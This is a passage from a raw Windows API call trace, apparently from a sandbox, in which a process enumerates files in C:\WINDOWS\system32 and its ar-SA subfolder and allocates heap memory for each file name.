cAlternateFileName="")) returned 1 [0102.765] lstrlenW (lpString="AppXDeploymentClient.dll") returned 24 [0102.766] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb2) returned 0x730308 [0102.766] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a40ef8, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x6938b592, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x41a40ef8, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x11fba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppxPackaging.dll", cAlternateFileName="")) returned 1 [0102.766] lstrlenW (lpString="AppxPackaging.dll") returned 17 [0102.766] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa4) returned 0x72cab8 [0102.766] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7081e417, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7081e417, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7081e417, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xada, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppxProvisioning.xml", cAlternateFileName="")) returned 1 [0102.766] lstrlenW (lpString="AppxProvisioning.xml") returned 20 [0102.766] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f83d66, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x71f83d66, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x71f83d66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x26200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppxSip.dll", cAlternateFileName="")) returned 1 [0102.766] lstrlenW (lpString="AppxSip.dll") returned 11 [0102.766] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730ea0 [0102.766] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffba03de, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9ecaa616, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0102.766] lstrlenW (lpString="ar-SA") returned 5 [0102.766] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x7303c8 [0102.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\ar-SA\\*", lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffba03de, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9ecaa616, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a058 [0102.813] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffba03de, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9ecaa616, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.813] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d205bba, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d205bba, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d205bba, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdosys.dll.mui", cAlternateFileName="")) returned 1 [0102.813] lstrlenW (lpString="cdosys.dll.mui") returned 14 [0102.814] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75529e99, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x75529e99, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x75529e99, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0102.814] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0102.814] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7546b289, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7546b289, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7546b289, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0102.814] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0102.814] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x776b1b4c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x776b1b4c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x776b1b4c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0102.814] lstrlenW (lpString="fms.dll.mui") returned 11 [0102.814] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5072d469, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x5072d469, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x5072d469, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0102.815] lstrlenW (lpString="mlang.dll.mui") returned 13 [0102.815] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bd1c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6a27bd1c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6a27bd1c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0102.815] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0102.815] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d69c942, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x9e26238d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xaf366500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="quickassist.exe.mui", cAlternateFileName="")) returned 1 [0102.815] lstrlenW (lpString="quickassist.exe.mui") returned 19 [0102.815] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c0d4fa, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x59c0d4fa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x59c0d4fa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="windows.ui.xaml.dll.mui", cAlternateFileName="")) returned 1 [0102.815] lstrlenW (lpString="windows.ui.xaml.dll.mui") returned 23 [0102.816] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x7303c8 | out: lpFindFileData=0x7303c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c0d4fa, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x59c0d4fa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x59c0d4fa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="windows.ui.xaml.dll.mui", cAlternateFileName="")) returned 0 [0102.816] FindClose (in: hFindFile=0x70a058 | out: hFindFile=0x70a058) returned 1 [0102.817] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7303c8 | out: hHeap=0x6f0000) returned 1 [0102.817] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713bdf8b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x713bdf8b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x713bdf8b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARP.EXE", cAlternateFileName="")) returned 1 [0102.817] lstrlenW (lpString="ARP.EXE") returned 7 [0102.817] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x90) returned 0x70f668 [0102.817] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954773d8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x954773d8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x954773d8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="asferror.dll", cAlternateFileName="")) returned 1 [0102.817] lstrlenW (lpString="asferror.dll") returned 12 [0102.818] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7322f0 [0102.818] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cb631a6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9cb631a6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9cb631a6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_counters.dll", cAlternateFileName="")) returned 1 [0102.818] lstrlenW (lpString="aspnet_counters.dll") returned 19 [0102.818] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa8) returned 0x72ddf8 [0102.818] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ffec2b, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x17412392, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x47ffec2b, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="asycfilt.dll", cAlternateFileName="")) returned 1 [0102.818] lstrlenW (lpString="asycfilt.dll") returned 12 [0102.818] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x732830 [0102.820] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9f5fc8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6f9f5fc8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6f9f5fc8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="at.exe", cAlternateFileName="")) returned 1 [0102.820] lstrlenW (lpString="at.exe") returned 6 [0102.820] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8e) returned 0x7303c8 [0102.820] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d252089, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d252089, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d252089, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtBroker.exe", cAlternateFileName="")) returned 1 [0102.820] lstrlenW (lpString="AtBroker.exe") returned 12 [0102.821] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731fa8 [0102.821] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f378a0, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x71f378a0, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x71f378a0, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl.dll", cAlternateFileName="")) returned 1 [0102.821] lstrlenW (lpString="atl.dll") returned 7 [0102.821] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x90) returned 0x730460 [0102.821] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x592e8600, ftCreationTime.dwHighDateTime=0x1cc27ca, ftLastAccessTime.dwLowDateTime=0xc847ed62, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0x592e8600, ftLastWriteTime.dwHighDateTime=0x1cc27ca, nFileSizeHigh=0x0, nFileSizeLow=0x21b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl100.dll", cAlternateFileName="")) returned 1 [0102.821] lstrlenW (lpString="atl100.dll") returned 10 [0102.821] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x730f40 [0102.821] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37dc0e00, ftCreationTime.dwHighDateTime=0x1ce653a, ftLastAccessTime.dwLowDateTime=0xcf7d4be8, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0x37dc0e00, ftLastWriteTime.dwHighDateTime=0x1ce653a, nFileSizeHigh=0x0, nFileSizeLow=0x28248, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl110.dll", cAlternateFileName="")) returned 1 [0102.822] lstrlenW (lpString="atl110.dll") returned 10 [0102.822] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x731300 [0102.822] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="atlthunk.dll", cAlternateFileName="")) returned 1 [0102.822] lstrlenW (lpString="atlthunk.dll") returned 12 [0102.822] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x732050 [0102.822] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a6715f, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xb43fdda2, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x41a8d3b9, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x4bfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmfd.dll", cAlternateFileName="")) returned 1 [0102.822] lstrlenW (lpString="atmfd.dll") returned 9 [0102.822] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x7313a0 [0102.822] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a6715f, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xb40b69c8, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x41a6715f, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmlib.dll", cAlternateFileName="")) returned 1 [0102.823] lstrlenW (lpString="atmlib.dll") returned 10 [0102.823] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x731580 [0102.823] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7210156f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7210156f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7210156f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="attrib.exe", cAlternateFileName="")) returned 1 [0102.823] lstrlenW (lpString="attrib.exe") returned 10 [0102.823] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x730a40 [0102.823] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cf4301e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9cf4301e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9cf69289, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3c200, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodev.dll", cAlternateFileName="")) returned 1 [0102.823] lstrlenW (lpString="audiodev.dll") returned 12 [0102.823] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7321a0 [0102.823] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2243c2, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x6f2243c2, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x6f2243c2, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x123ef0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioEng.dll", cAlternateFileName="")) returned 1 [0102.823] lstrlenW (lpString="AudioEng.dll") returned 12 [0102.824] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x732398 [0102.824] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b352cb1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b352cb1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b352cb1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5b938, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUDIOKSE.dll", cAlternateFileName="")) returned 1 [0102.824] lstrlenW (lpString="AUDIOKSE.dll") returned 12 [0102.824] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x732590 [0102.824] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2243c2, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x6f2243c2, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x6f2243c2, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0xd2ff8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioSes.dll", cAlternateFileName="")) returned 1 [0102.824] lstrlenW (lpString="AudioSes.dll") returned 12 [0102.824] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7324e8 [0102.824] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7771dc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe3c15d22, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe3c15d22, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x35e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditNativeSnapIn.dll", cAlternateFileName="")) returned 1 [0102.824] lstrlenW (lpString="AuditNativeSnapIn.dll") returned 21 [0102.825] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xac) returned 0x7304f8 [0102.825] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb737d8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb737d8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb737d8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpol.exe", cAlternateFileName="")) returned 1 [0102.825] lstrlenW (lpString="auditpol.exe") returned 12 [0102.825] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731b10 [0102.825] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb737d8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb737d8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb737d8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpolcore.dll", cAlternateFileName="")) returned 1 [0102.825] lstrlenW (lpString="auditpolcore.dll") returned 16 [0102.825] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72d198 [0102.825] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7771dc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe3beface, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe3beface, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xde00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditPolicyGPInterop.dll", cAlternateFileName="")) returned 1 [0102.825] lstrlenW (lpString="AuditPolicyGPInterop.dll") returned 24 [0102.826] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb2) returned 0x7305b0 [0102.826] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7771dc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe3beface, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe3beface, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x17600, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpolmsg.dll", cAlternateFileName="")) returned 1 [0102.826] lstrlenW (lpString="auditpolmsg.dll") returned 15 [0102.826] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x732248 [0102.826] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb010a3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb010a3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb010a3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthBroker.dll", cAlternateFileName="")) returned 1 [0102.826] lstrlenW (lpString="AuthBroker.dll") returned 14 [0102.827] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9e) returned 0x732440 [0102.827] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, 